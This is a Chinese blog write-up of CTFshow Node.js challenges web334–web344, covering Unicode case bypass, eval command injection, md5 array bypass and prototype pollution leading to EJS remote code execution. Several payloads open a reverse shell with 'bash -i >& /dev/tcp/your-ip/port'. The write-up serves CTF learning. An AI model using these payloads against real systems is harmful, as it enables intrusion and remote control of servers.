CTFshow nodejs

最新推荐文章于 2024-04-27 17:12:18 发布
最新推荐文章于 2024-04-27 17:12:18 发布
阅读量610 收藏
点赞数
文章标签: javascript 原型模式 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starttv/article/details/127941885
版权

CTFshow Node.js

CTFshow Node.js

Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。

Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs 在前端也大放异彩,带来了 Web 前端开发的革命。Nodejs 下运行 JS 代码有两种方式,一种是在 Node.js 的交互环境下运行,另外一种是把代码写入文件中,然后用 node 命令执行文件代码。Nodejs 跟浏览器是不同的环境,写 JS 代码的时候要注意这些差异。

web334

下载源码分析,user.js存在用户名和密码

在login.js存在findUser函数,其中name.toUpperCase()将小写字符串转换为大写

toUpperCase这个函数有个特点:
字符ı、ſ 经过toUpperCase()处理后结果为 I、S
字符K经过toLowerCase()处理后结果为k

Payload:

username=ctfshow
password=123456

或者

username=ctfſhow
password=123456

web335

右键查看源代码发现提示

猜测可能是get上传eval参数执行nodejs代码

Payload:

?eval=require('child_process').execSync('tac f*').toString()

?eval=require( 'child_process' ).spawnSync( 'cat', [ 'f*' ] ).stdout.toString()

web336

发现好像过滤了一些东西,通配符无法使用。

Payload:

?eval=require('child_process').spawnSync('ls',['./']).stdout.toString()

?eval=require('child_process').spawnSync('cat',['./fl001g.txt']).stdout.toString()

web337

md5绕过

if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  res.end(flag);
}else{
  res.render('index',{ msg: 'tql'});
}

Payload1:

?a[0]=1&b[0]=1

可以发现两者的值相等,但是a!==b,后面跟上字符串后md5加密后的值也是相等的。

Payload2:

?a[x]=any&b[x]=anywhere

可以发现传入一个JSON值输出之后都是一个[object Object]+字符,所以md5加密后的值也是相等的。

注意:两个payload是不一样的,数字是数组的下标,字符是键值对。

web338

原型链污染

在做原型链污染的时候最好使用bp发包,用hackerbar可能有点小问题。

参考链接:

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x02-javascript

大致的意思是我们需要找到一个能够控制数组(对象)的“键名”的操作。

我们可以在common.js中找到一个copy函数

function copy(object1, object2){
    for (let key in object2) {
        if (key in object2 && key in object1) {
            copy(object1[key], object2[key])
        } else {
            object1[key] = object2[key]
        }
    }
  }

在合并的过程中,存在赋值的操作target[key] = source[key],那么,这个key如果是__proto__,就可以原型链污染。

在login.js中调用了copy函数

  var secert = {};
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }

Payload:

{"__proto__":{"ctfshow":"36dboy"}}

web339

原型链污染+

这道题比上个多出个api.js

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  res.render('api', { query: Function(query)(query)});
   
});

做个小测试

function copy(object1, object2){
    for (let key in object2) {
        if (key in object2 && key in object1) {
            copy(object1[key], object2[key])
        } else {
            object1[key] = object2[key]
        }
    }
  }

user = {}
body = JSON.parse('{"__proto__":{"query":"return 2233"}}');
copy(user, body)
{ query: Function(query)}(query)}
console.log(query)

发现query的值为2233,在调用copy时,原型链被污染了

那么为什么 {query: Function(query)(query)}为{ query : 2233 }

可以看到两者的执行结果是一样的,nodejs中定义函数这两种方法都可以。

Payload(非预期):

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-ip/port 0>&1\"');var __tmp2"}}

先在login污染,后访问api反弹shell。这里为什么要用outputFunctionName,请看参考链接。

https://blog.csdn.net/DARKNOTES/article/details/124000520

web340

原型链污染++

这道题和上道题的区别在这里,user里面有个userinfo属性,userinfo的原型是user,user的原型才是object,所以要多加一层__proto__,我们要污染object中的query。

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var user = new function(){
    this.userinfo = new function(){
    this.isVIP = false;
    this.isAdmin = false;
    this.isAuthor = false;   
    };
  }
  utils.copy(user.userinfo,req.body);
  if(user.userinfo.isAdmin){
   res.end(flag);
  }else{
   return res.json({ret_code: 2, ret_msg: '登录失败'});  
  }
  
  
});

Payload:

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-ip/port 0>&1\"')"}}}

web341

原型链污染+++

通过snyk扫描源代码发现ejs 远程代码执行(RCE)

在这里插入图片描述

参考链接:

https://evi0s.com/2019/08/30/expresslodashejs-%E4%BB%8E%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93%E5%88%B0rce

ejs漏洞由ejs模块中渲染页面触发的,位于app.js下。

app.engine('html', require('ejs').__express);

Payload:

{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-ip/port 0>&1\"');var __tmp2"}}}

随后访问服务器根目录即可得到flag

在这里插入图片描述

web342

原型链污染++++

直接放payload:
先在login污染原型,然后随便发一次包即可反弹成功。

{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/your-ip/port 0>&1\"')"}}}

为什么没有过程?我不会哇
看大佬链接:https://tari.moe/2021/05/04/ctfshow-nodejs/
但是这位师傅的payload我没有反弹成功

web343

原型链污染+++++

与上题一样,多了个过滤,不影响。
login.js中多了,不知道这句话有什么用。

if(JSON.stringify(req.body).match(/Text/ig)){
    res.end('hacker go away');
  }

web344

nodejs特性

if(req.url.match(/8c|2c|\,/ig)){
  	res.end('where is flag :)');
  }
var query = JSON.parse(req.query.query);
if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
  	res.end(flag);
  }

这里利用JSON.parse()的解析特性,如果我们分开多个query传值,req.query.query会将所有参数query的值都放在一个数组中,接着JSON.parse()解析时会将数组中的元素都拼接起来再解析,这就绕过了逗号的使用。
c在url编码过程中会与"组成%22c,2c会与正则匹配。所以要把c进行URL编码为%63
Payload:

?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}

Sn_u
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTF 在Nodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
NodeJS API文档
01-16
NodeJS API文档。Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境。 Node.js 使用了一个事件驱动、非阻塞式 I/O 的模型。Node 是一个让 JavaScript 运行在服务端的开发平台,它让 JavaScript 成为与PHP、...
ctfshow nodejs
qq_53263789的博客
02-09 687
前言 文档先阅读一遍 Node.js 教程 | 菜鸟教程 (runoob.com) 常见漏洞 Node.js 常见漏洞学习与总结 - 先知社区 (aliyun.com) nodejs一些入门特性&&实战 - 先知社区 (aliyun.com) 原型链污染 深入理解 JavaScript Prototype 污染攻击 | 离别歌 (leavesongs.com) 模板引擎rce XNUCA2019 Hardjs题解 从原型链污染到RCE - 先知社区 (aliyun.com) 再探 JavaS
CTF-Show nodejs
最新发布
2301_80125214的博客
04-27 624
下载附件,有两个文件在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。所以用ctfſhow 123456登录就可以出flag了。
CTFSHOW-nodejs
Yb_140的博客
05-13 776
web334 下载附件,添加后缀 .zip,之后打开,发现有两个文件login.js和user.js 发现用户名和密码 用户名不能为CTFSHOW 其中toUpperCase()函数为转为大写 所以输入的用户名为ctfshow,密码为123456 得到flag web335 查看页面源代码,发现 可能为GET传参,命令执行 在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是F.
CTFSHOW nodejs
羽的博客
02-18 6761
web334 在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。 在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。 所以用ctfſhow 123456登录就可以出flag了 web335 require( 'child_process' ).spawnSync( 'ls', [ '/' ] ).stdout.toString() web336 require( 'child_process' ).spawnSync( 'ls
ctfshow Nodejs
weixin_63231007的博客
03-08 645
承接上文nodejs原型链漏洞刷题练习
nodejs111111111111
08-16
自留
nodeJS微信分享
10-18
主要为大家详细介绍了nodeJS微信分享的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
nodejs.hpi
05-29
jekins 构建vue项目需要使用的插件, 之前在CSDN上下了几个都没有, 有的只有一个插件, 有的挺全的但是不是我要用的, 最后自己找到这个上传到CSDN,写的很清楚了,就是nodejs的插件, 没有别的, 是jekins 的nodejs插件
NodeJS 安装包
07-02
NodeJS 是一个基于 Chrome V8 引擎的 JavaScript 运行环境,它让开发者能够在服务器端使用 JavaScript 进行编程,极大地推动了全栈开发的流行。NodeJS 的设计思想是事件驱动、非阻塞 I/O 模型,这使得它在处理高并发...
ctfshow_nodejs
qq_45951598的博客
03-13 279
这里写目录标题web334web335方法一方法二web336 web334 打开题目下载源码 打开longin.js var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ r
CTFshow——Node.js
D.MIND 的博客
05-19 736
require() 用于引入模块、 JSON、或本地文件 // 引入本地模块: const myLocalModule = require('./path/myLocalModule'); // 引入 JSON 文件: const jsonData = require('./path/filename.json'); // 引入 node_modules 模块或 Node.js 内置模块: const crypto = require('crypto'); 334 user.js中有登录的账号密码,但
【CTFSHOW】web入门 NodeJS
7ruth0hn的博客
10-04 585
文章目录写在前面web334web335web336web337web338web339参考资料 写在前面 web334 下载附件,其中user.js得到用户名为: CTFSHOW 密码为: 123456 审计login.js代码,其中: return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; 得到name不能为“CTFSHOW”,但只要
ctfshow node.js专题
akxnxbshai的博客
12-02 519
学习一下node,js。
ctfshow-nodejs
qq_63928796的博客
12-29 225
这里就是原型链污染,参考:https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html#0x02-javascript。只要满足secert.ctfshow==='36dboy’就可以了,前面有一个copy函数,可以与链接文章里面的merge函数类比.附件给了user.js和login.js,user.js告诉了用户名和密码。和上一题一样,但上一题的payload不能用了。a 和 b 的长度相等。
[CTFSHOW] nodejs
Dannie01的博客
11-06 423
web 334 下载源码.zip #user.js module.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ] }; var express = require('express'); var router = express.Router(); var users = require('../modules/user').items; var findUser = function(name, pas
Ctfshow web入门 nodejsweb334-web344
Jay17的博客
07-06 1620
Ctfshow web入门 nodejsweb334-web344

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值